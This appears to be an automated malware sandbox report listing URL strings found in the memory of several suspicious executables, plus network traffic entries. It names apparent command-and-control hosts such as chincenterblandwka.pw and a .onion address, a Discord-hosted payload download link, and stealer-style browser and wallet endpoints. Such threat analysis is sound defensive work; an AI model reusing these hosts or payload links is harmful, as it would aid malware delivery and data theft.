Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://www.googlebot.com/bot.html)Links
Source: tuc4.tmp, tuc4.tmp, 00000018.00000000.2054745965.0000000000401000.00000020.00000001.01000000.00000011.sdmp, tuc4.exe, 0000001B.00000003.2077119869.0000000002340000.00000004.00001000.00020000.00000000.sdmp, tuc4.exe, 0000001B.00000003.2078602095.0000000002088000.00000004.00001000.00020000.00000000.sdmp, tuc4.tmp, 0000001D.00000002.3178968122.0000000000401000.00000020.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: tuc4.exe, 00000013.00000003.2052267077.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tuc4.exe, 00000013.00000003.2050903874.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, tuc4.tmp, tuc4.tmp, 00000018.00000000.2054745965.0000000000401000.00000020.00000001.01000000.00000011.sdmp, tuc4.exe, 0000001B.00000003.2077119869.0000000002340000.00000004.00001000.00020000.00000000.sdmp, tuc4.exe, 0000001B.00000003.2078602095.0000000002088000.00000004.00001000.00020000.00000000.sdmp, tuc4.tmp, 0000001D.00000002.3178968122.0000000000401000.00000020.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: tuc4.exe, 00000013.00000003.2052267077.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tuc4.exe, 00000013.00000003.2050903874.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, tuc4.tmp, 00000018.00000000.2054745965.0000000000401000.00000020.00000001.01000000.00000011.sdmp, tuc4.exe, 0000001B.00000003.2077119869.0000000002340000.00000004.00001000.00020000.00000000.sdmp, tuc4.exe, 0000001B.00000003.2078602095.0000000002088000.00000004.00001000.00020000.00000000.sdmp, tuc4.tmp, 0000001D.00000002.3178968122.0000000000401000.00000020.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://www.spidersoft.com)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://yandex.com/bots)Opera
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://yandex.com/bots)Opera/9.51
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1680428061.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1676755416.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1676755416.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1680428061.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: explorer.exe, 00000001.00000000.1678371754.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1678371754.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1675817406.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1675217298.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1678371754.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1678371754.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: etopt.exe, 0000001A.00000002.2796162380.0000000004E69000.00000002.00001000.00020000.00000000.sdmp, etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.juhe.cn/ip/Example/query.phpclient
Source: etopt.exe, 0000001A.00000002.2796162380.0000000004E69000.00000002.00001000.00020000.00000000.sdmp, etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.map.qq.com/ws/location/v1/ip?key=3BFBZ-ZKD3X-LW54A-ZT76D-E7AHO-4RBD5&output=jsonstatusr
Source: explorer.exe, 00000001.00000000.1678371754.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: 907.exe, 00000006.00000002.1919407201.00000000044A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://az667904.vo.msecnd.net/pub
Source: 907.exe, 00000006.00000002.1919407201.00000000044A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://az700632.vo.msecnd.net/pub&RemoteSettings.json
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://blockchain.infoindex
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: https://blockstream.info/apiinva
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1676755416.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1676755416.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/=$
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/D$
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/E
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/F
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/K
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/LpQZyL
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/NTo
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/Q
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/api
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/api=
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/apiB
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/apiT
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/apii
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/apis
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/g
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/h
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/pi
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw:443/api
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw:443/api=
Source: 907.exe, 00000006.00000000.1906824742.0000000000DD1000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: 907.exe, 00000006.00000002.1919407201.00000000044A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/trackVDequeueAndSend:
Source: 907.exe, 00000006.00000000.1906824742.0000000000DD1000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://devdiv.visualstudio.com/DevDiv/_git/VSTelemetryAPI
Source: dialer.exe, 00000022.00000003.2678850470.000001B8F610B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: dialer.exe, 00000022.00000003.2678850470.000001B8F610B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1680428061.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1676755416.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1680428061.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1680428061.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C09E000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C0D6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.org
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C12A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C106000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSoftware
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C0D6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionhttps://
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C09E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttps://statscreate.orgRegQueryValueExWhttps://statscreate.orgUUIDUUIDPGDSEPG
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2520544884.0000000027121000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2520544884.0000000027121000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: dialer.exe, 00000022.00000003.2621740407.000001B8F60DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 5A58.exe, 0000001F.00000003.2483484906.0000000002EC9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2629212055.000001B8F6B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: dialer.exe, 00000022.00000003.2621740407.000001B8F60DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 5A58.exe, 0000001F.00000003.2483484906.0000000002EC9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2629212055.000001B8F6B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: dialer.exe, 00000022.00000003.2621843382.000001B8F6080000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
Source: 907.exe, 00000006.00000002.1919407201.00000000044A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://visualstudio-devdiv-c2s.msedge.net/ab
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1680428061.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1680428061.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: 5A58.exe, 0000001F.00000003.2535337503.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2506452251.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2521389340.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2569945953.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2550720373.0000000000995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2520544884.0000000027121000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2520544884.0000000027121000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2520544884.0000000027121000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2520544884.0000000027121000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: nsi4BEF.tmp.exe, 0000001E.00000003.2520544884.0000000027121000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1676755416.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1676755416.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: 907.exe, 00000006.00000000.1906824742.0000000000DD1000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: 907.exe, 00000006.00000000.1906824742.0000000000DD1000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonealarm.comhttps://www.kaspersky.comhttps://malwarebytes.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
